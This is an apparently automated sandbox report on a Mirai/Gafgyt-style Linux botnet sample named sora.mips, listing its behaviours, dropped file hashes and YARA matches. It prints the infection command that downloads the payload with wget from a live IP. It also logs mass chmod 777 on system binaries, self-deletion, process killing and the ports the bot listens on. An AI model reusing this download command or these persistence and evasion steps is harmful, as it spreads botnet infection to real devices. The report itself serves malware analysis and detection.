Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foomatic-rip (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-delete (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-enroll (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-list (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-verify (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/free (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/from (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ftp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/funzip (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fuser (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fusermount (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdagent (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdmgr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdtool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdtpmevlog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gacutil (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gamma4scanimage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gapplication (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gatttool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gawk (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gcore (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gcr-viewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdb-add-index (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbserver (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbtui (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbus (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdialog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-csource (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-pixdata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdm-screenshot (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdmflexiserver (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gedit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gem (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gem2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/genisoimage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/genxs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/geqn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getcifsacl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getconf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/geteltorito (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getent (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getfacl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getkeycodes (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getopt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gettext (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gettext.sh (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ghostscript (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gigolo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-2.10 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-console (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-console-2.10 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-test-clipboard-2.0 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ginstall-info (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gio (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gio-querymodules (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gipddecode (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-receive-pack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-shell (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-upload-archive (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-upload-pack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gjs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gjs-console (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gkbd-keyboard-display (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glib-compile-schemas (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxdemo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxgears (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxheads (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxinfo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-control-center (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-extensions (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-font-viewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-help (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior

Sets full permissions to files and/or directories

Source: /bin/sh (PID: 6217)

Chmod executable with 777: /usr/bin/chmod -> chmod 777 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

Jump to behavior

Writes ELF files to disk

Source: /usr/bin/wget (PID: 6216)

File written: /usr/bin/sora.mips

Jump to dropped file

Source: submitted sample

Stderr: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (6) Could not resolve host: cdcurl: (3) URL using bad/illegal format or missing URL--2024-04-26 08:32:16-- http://185.196.11.177/bins/sora.mipsConnecting to 185.196.11.177:80... connected.HTTP request sent, awaiting response... 200 OKLength: 28884 (28K)Saving to: sora.mips 0K .......... .......... ........ 100% 103K=0.3s2024-04-26 08:32:17 (103 KB/s) - sora.mips saved [28884/28884]: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /usr/bin/wget (PID: 6216)

File: /usr/bin/sora.mips

Jump to dropped file

Sample deletes itself

Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/chmod	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/curl	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/rm	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/sora.mips	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/wget	Jump to behavior

ELF contains segments with high entropy indicating compressed/encrypted content

Source: sora.mips.14.dr

Dropped file: segment LOAD with 7.892 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /usr/bin/curl (PID: 6214)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sora.mips (PID: 6218)	Queries kernel information via 'uname':			Jump to behavior

Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: QV!/proc/2014/fd/11mips/pr1/usr/bin/vmtoolsd (deleted)
Source: sh, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6220.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6221.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6418.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6227.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6229.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6412.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6414.1.00005651e0f68000.00005651e0fef000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6220.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6221.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6418.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6227.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6229.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6412.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6414.1.00007ffecd533000.00007ffecd554000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6220.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6221.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6418.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6227.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6229.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6412.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6414.1.00007ffecd533000.00007ffecd554000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips./sora.mipsthinkphpSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/usr/bin./sora.mips
Source: sh, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6220.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6221.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6418.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6227.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6229.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6412.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6414.1.00005651e0f68000.00005651e0fef000.rw-.sdmp	Binary or memory string: QVGeneralNames!/etc/qemu-binfmt/mips
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips (deleted)
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd (deleted)
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: QV/mips/0 /proc/1622/fd/9!/proc/1890/fd/34mips/pr1/proc/2028/fd/9/mips/0!/proc/1623/exe!/proc/1890/fd/33mips/pr1/proc/2079/fd/5/mips/0!/proc/1623/fd!/proc/1890/fd/32mips/pr1/proc/2028/fd/10mips/0!/proc/1623/fd/.!/proc/1890/fd/31mips/pr1/usr/bin/qemu-mips (deleted)0!/proc/1623/fd/..!/proc/1890/fd/30mips/pr1/proc/2028/fd/11mips/0!/proc/1623/fd/0!/proc/1890/fd/29mips/pr1/proc/2079/fd/4/mips/0!/proc/1623/fd/1!/proc/1890/fd/28mips/pr1/proc/2028/fd/13mips/0!/proc/1623/fd/2!/proc/1890/fd/27mips/pr1/proc/6224/exe/mips/0!/proc/1623/fd/3!/proc/1890/fd/26mips/pr1/proc/2033/exe/mips/0!/proc/1623/fd/4!/proc/1890/fd/25mips/pr1/proc/2079/fd/3/mips/0!/proc/1623/fd/5!/proc/1890/fd/24mips/pr1/proc/2033/fd/mips/0!/proc/1623/fd/6!/proc/1890/fd/23mips/pr1`0

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY

Screenshots

No Screenshots

Network Map

⊘No contacted IP infos

Name	Type	MD5	SHA1	SHA256
/usr/bin/sora.mips	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header	3536FDC9645687EAA6FA345EB8E3294C	5481A0CA12D1F371F9F2EFA92A0C84F95FB64707	93BE4F45D82B5EDB6D3047BA025D2F33CF8170B569D4AE29D6FCF2CF199B9FED

Executes the "wget" command typically used for HTTP/S downloading

Source: /bin/sh (PID: 6216)

Wget executable: /usr/bin/wget -> wget http://185.196.11.177/bins/sora.mips

Jump to behavior

Reads the 'hosts' file potentially containing internal network hosts

Source: /usr/bin/curl (PID: 6214)

Reads hosts file: /etc/hosts

Jump to behavior

Sample listens on a socket

Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::0	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::23	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::80	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::52869	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::37215	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::0	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::23	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::80	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::52869	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::37215	Jump to behavior

Source: sora.mips.14.dr

String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: sora.mips PID: 6221, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /usr/bin/sora.mips (PID: 6220)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6189, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6190, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6229, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6414)	SIGKILL sent: pid: 6412, result: successful	Jump to behavior

Sample tries to kill a process (SIGKILL)

Source: /usr/bin/sora.mips (PID: 6220)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6189, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6190, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6229, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6414)	SIGKILL sent: pid: 6412, result: successful	Jump to behavior

Yara signature match

Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
